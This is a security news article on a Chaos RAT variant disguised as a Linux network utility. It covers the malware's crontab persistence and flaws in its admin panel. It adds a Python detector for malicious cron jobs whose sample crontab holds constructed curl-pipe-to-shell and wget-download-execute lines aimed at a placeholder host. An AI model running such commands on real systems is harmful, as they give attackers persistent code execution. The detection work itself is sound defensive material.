Threat hunters are calling attention to a new variant of a remote access trojan (RAT) called Chaos RAT that has been used in recent attacks targeting Windows and Linux systems.
According to findings from Acronis, the malicious artifact may have been distributed by tricking victims into downloading a network troubleshooting utility for Linux environments.
"Chaos RAT is an open-source RAT written in Golang, offering cross-platform support for both Windows and Linux systems," Acronis researchers said in a report shared with The Hacker News.
"Inspired by popular frameworks such as Cobalt Strike and Sliver, Chaos RAT provides an administrative panel where users can build payloads, establish sessions, and control compromised machines."
While work on the "remote administration tool" started back in 2017, it did not attract attention until December 2022, when it was used in a malicious campaign targeting public-facing web applications hosted on Linux systems together with the XMRig cryptocurrency miner.
Once installed, the malware connects to an external server and awaits commands that allow it to launch reverse shells, upload/download/delete files, enumerate files and directories, take screenshots, gather system information, lock/restart/shut down the machine, and open arbitrary URLs. The latest version of Chaos RAT, 5.0.3, was released on May 31, 2024.
Acronis said Linux variants of the malware have been found in the wild, often in connection with cryptocurrency mining campaigns. The attack chains observed by the company show that Chaos RAT is delivered to victims through phishing emails containing malicious links or attachments.
These artifacts are designed to drop a malicious script that modifies the "/etc/crontab" task scheduler so that the malware is periodically re-downloaded, which is how the attackers establish persistence: even if the dropped binary is removed, the cron job fetches it again on the next run.
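The crontab-based persistence described above leaves a recognisable footprint: a scheduled job that reaches out to a remote URL and either pipes the response into a shell or stages a binary under a world-writable directory. The following script is an added example, not code from Acronis or from the Chaos RAT project; it parses text in /etc/crontab syntax (schedule, user, command) and flags entries that show those traits. The crontab content and the 203.0.113.10 address are constructed for illustration and do not come from a real infection.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in /etc/crontab format (schedule, user, command). The two
# fetch-and-run entries are invented illustrations of the persistence pattern
# described in the article, not lines recovered from a real compromise.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 *   * * *   root    curl -fsSL http://203.0.113.10/na.sh | sh
@reboot         root    wget -q -O /tmp/.na http://203.0.113.10/na && chmod +x /tmp/.na && /tmp/.na
0 3     * * *   backup  /usr/local/bin/backup.sh
"""

# Indicators of a download-and-execute job. Each one alone can be benign;
# the combination on a single cron line is what a responder should look at.
FETCH_TOOL = re.compile(r"\b(curl|wget|fetch)\b")
URL = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|z|da)?sh\b")
WORLD_WRITABLE = re.compile(r"(?:^|\s|=)/(?:tmp|var/tmp|dev/shm)/")
HIDDEN_PATH = re.compile(r"/\.[^/\s]+")


@dataclass
class CronEntry:
    schedule: str
    user: str
    command: str
    reasons: list = field(default_factory=list)


def parse_system_crontab(text):
    """Return a CronEntry for every job line in /etc/crontab syntax.

    Blank lines, comments and VAR=value assignments are skipped. Both the
    five-field form and the @reboot/@daily shorthand are handled.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue  # environment assignment such as SHELL= or PATH=
        if line.startswith("@"):
            fields = line.split(None, 2)
            if len(fields) < 3:
                continue
            schedule, user, command = fields
        else:
            fields = line.split(None, 6)
            if len(fields) < 7:
                continue
            schedule = " ".join(fields[:5])
            user, command = fields[5], fields[6]
        entries.append(CronEntry(schedule, user, command))
    return entries


def score_entry(entry):
    """Attach a human-readable reason for every indicator the command trips."""
    cmd = entry.command
    if FETCH_TOOL.search(cmd) and URL.search(cmd):
        entry.reasons.append("fetches content from a remote URL")
    if PIPE_TO_SHELL.search(cmd):
        entry.reasons.append("pipes downloaded data straight into a shell")
    if WORLD_WRITABLE.search(cmd):
        entry.reasons.append("stages or executes a file under a world-writable directory")
    if HIDDEN_PATH.search(cmd):
        entry.reasons.append("references a hidden (dot-prefixed) path")
    return entry


def find_suspicious_jobs(text):
    """Parse crontab text and return only the entries with at least one reason."""
    return [e for e in (score_entry(e) for e in parse_system_crontab(text)) if e.reasons]


if __name__ == "__main__":
    for job in find_suspicious_jobs(SAMPLE_CRONTAB):
        print(f"[{job.user}] {job.schedule}: {job.command}")
        for reason in job.reasons:
            print(f"    - {reason}")
```

On a live host, feed the script the contents of /etc/crontab, /etc/cron.d/* and each user's spool under /var/spool/cron; the two benign run-parts entries in the sample are the kind of stock Debian lines the filter must not flag, which is why a job is only reported when it carries a download-and-execute trait rather than merely mentioning a URL.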
"Early campaigns used this technique to deliver cryptocurrency miners and Chaos RAT separately, indicating that Chaos was mainly used for reconnaissance and information gathering on compromised devices," the researchers said.
Analysis of a recent sample uploaded to VirusTotal in January 2025 from India, named "NetworkAnalyzer.gz", suggests that users are being tricked into downloading the malware by passing it off as a network troubleshooting utility for Linux environments.
In addition, the admin panel that lets operators build payloads and manage infected machines was found to be susceptible to a command injection vulnerability (CVE-2024-30850, CVSS score: 8.8), which could be chained with a cross-site scripting flaw (CVE-2024-31839, CVSS score: 4.8) to execute arbitrary code on the server with elevated privileges. In other words, the RAT's own control panel could be turned against its operator. Both vulnerabilities have since been addressed by the RAT's maintainer as of May 2024.
While it is currently unclear who is behind the use of the RAT in real-world attacks, the development once again illustrates how threat actors continue to weaponize open-source tools to their advantage and to muddy attribution efforts.
"What begins as a developer's tool can quickly become a threat actor's weapon of choice," the researchers said. "The use of public malware helps APT groups blend into the noise of everyday cybercrime. Open-source malware offers a 'good enough' toolkit that can be quickly customized and deployed. If several actors use the same open-source malware, it also muddies attribution."
The disclosure coincides with the emergence of a new campaign targeting Trust Wallet users on desktop with counterfeit versions of the wallet, distributed through deceptive download links, that deliver clipper malware.
"Once installed, the malware can scan for wallet files, intercept clipboard data, or monitor browser sessions to capture seed phrases or private keys," Point Wild researcher Kedar S Pandit said in a report published this week.